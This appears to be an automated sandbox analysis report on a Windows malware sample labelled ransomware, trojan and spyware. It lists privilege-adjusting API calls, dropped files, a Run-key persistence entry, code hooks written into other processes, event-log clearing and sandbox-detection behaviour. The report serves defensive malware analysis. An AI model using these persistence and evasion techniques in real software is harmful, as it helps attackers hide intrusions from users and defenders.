Source: N6xnw0iEGs.exe, 00000000.00000001.1750015972.00000000005B7000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename7z.sfx.exe, vs N6xnw0iEGs.exe
Source: N6xnw0iEGs.exe, 00000000.00000002.2992419082.0000000005410000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs N6xnw0iEGs.exe
Source: N6xnw0iEGs.exe	Binary or memory string: OriginalFilename7z.sfx.exe, vs N6xnw0iEGs.exe

Source: N6xnw0iEGs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@5/8@1/2

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042918A4 AdjustTokenPrivileges,	0_2_042918A4
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_100018A0 AdjustTokenPrivileges,	0_2_100018A0
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_100018EA OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,	0_2_100018EA
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10001772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,	0_2_10001772
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D88B20 CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,	6_2_03D88B20
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D89070 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	6_2_03D89070
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D88C40 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	6_2_03D88C40

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D88150 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,

6_2_03D88150

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Code function: 0_2_100017FE CreateToolhelp32Snapshot,_memset,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,

0_2_100017FE

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Code function: 0_2_04292E16 VariantInit,CoInitialize,CoCreateInstance,SafeArrayAccessData,SafeArrayGetLBound,SafeArrayGetUBound,CoTaskMemAlloc,SafeArrayUnaccessData,VariantClear,CoUninitialize,

0_2_04292E16

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

File created: C:\Program Files (x86)\IemFNe

Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tant[1].bmp

Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Mutant created: \Sessions\1\BaseNamedObjects\2024. 9.12
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Mutant created: \Sessions\1\BaseNamedObjects\MyProgramMutex
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{2a120cb6-807b-432f-a7a8-23047b4af89c}

Source: N6xnw0iEGs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: N6xnw0iEGs.exe	ReversingLabs: Detection: 21%
Source: N6xnw0iEGs.exe	Virustotal: Detection: 29%

Source: Fj0RhXL.exe	String found in binary or memory: <!--StartFragment -->
Source: Fj0RhXL.exe	String found in binary or memory: <!--StartFragment -->
Source: Fj0RhXL.exe	String found in binary or memory: <!--StartFragment -->
Source: Fj0RhXL.exe	String found in binary or memory: <!--StartFragment -->

Source: unknown	Process created: C:\Users\user\Desktop\N6xnw0iEGs.exe "C:\Users\user\Desktop\N6xnw0iEGs.exe"
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Source: unknown	Process created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Source: unknown	Process created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: libcef.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: libcef.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: libcef.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: N6xnw0iEGs.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: N6xnw0iEGs.exe

Static file information: File size 31561216 > 1048576

Source: N6xnw0iEGs.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x154a00
Source: N6xnw0iEGs.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1c09400

Source: N6xnw0iEGs.exe

Static PE information: More than 200 imports for USER32.dll

Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N6xnw0iEGs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: N6xnw0iEGs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
Source:	Binary string: J:\work\res_checker\netdia\Release\NetDiagnotor.pdb source: N6xnw0iEGs.exe
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr

Source: N6xnw0iEGs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N6xnw0iEGs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N6xnw0iEGs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N6xnw0iEGs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N6xnw0iEGs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_02F0C5FC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

6_2_02F0C5FC

Source: initial sample

Static PE information: section where entry point is pointing to: .ubx1

Source: Fj0RhXL.exe.0.dr	Static PE information: section name: .00cfg
Source: Fj0RhXL.exe.0.dr	Static PE information: section name: .ubx0
Source: Fj0RhXL.exe.0.dr	Static PE information: section name: .ubx1

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_0052D14B push ecx; ret	0_2_0052D15E
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_0429EC99 push ecx; ret	0_2_0429ECAC
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042A3A9A push ecx; ret	0_2_042A3AAD
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_1000EC95 push ecx; ret	0_2_1000ECA8
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10013A96 push ecx; ret	0_2_10013AA9
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F09EC5 push ecx; ret	6_2_02F09ED8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DA2F35 push ecx; ret	6_2_03DA2F48
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9CD01 push ecx; ret	6_2_03D9CD14
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DB2484 push ebp; retf	6_2_03DB24A4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DB24A0 push ebp; retf	6_2_03DB24A4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DB246C push ebp; retf	6_2_03DB24A4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DB2430 push ebp; retf	6_2_03DB24A4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3DFF94 push 3BFFFFFFh; retf	6_2_6C3DFF99
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D7865 push ecx; ret	6_2_6C3D7878
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C39B993 push 03FFFFFFh; retf	6_2_6C39B998
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C39B6AD push 03FFFFFFh; retf	6_2_6C39B6B2
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F73A8 push ecx; ret	6_2_6C3F7398
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F7399 push ecx; ret	6_2_6C3F7398
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032B9892 push ecx; ret	6_2_032B98A5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3DFF94 push 3BFFFFFFh; retf	7_2_6C3DFF99
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D7865 push ecx; ret	7_2_6C3D7878
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C39B993 push 03FFFFFFh; retf	7_2_6C39B998
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C39B6AD push 03FFFFFFh; retf	7_2_6C39B6B2
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F73A8 push ecx; ret	7_2_6C3F7398
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F7399 push ecx; ret	7_2_6C3F7398

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	File created: C:\Program Files (x86)\IemFNe\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	File created: C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	File created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	File created: C:\Program Files (x86)\IemFNe\libcef.dll	Jump to dropped file

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWS			Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 5408 base: 2E00005 value: E9 8B 2F 10 74	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 5408 base: 76F02F90 value: E9 7A D0 EF 8B	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 5408 base: 2E10007 value: E9 EB DF 12 74	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 5408 base: 76F3DFF0 value: E9 1E 20 ED 8B	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 7316 base: 1360005 value: E9 8B 2F BA 75	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 7316 base: 76F02F90 value: E9 7A D0 45 8A	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 7316 base: 1370007 value: E9 EB DF BC 75	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 7316 base: 76F3DFF0 value: E9 1E 20 43 8A	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 1432 base: 1310005 value: E9 8B 2F BF 75	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 1432 base: 76F02F90 value: E9 7A D0 40 8A	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 1432 base: 1470007 value: E9 EB DF AC 75	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Memory written: PID: 1432 base: 76F3DFF0 value: E9 1E 20 53 8A	Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D96080 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,

6_2_03D96080

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Key value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059

Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

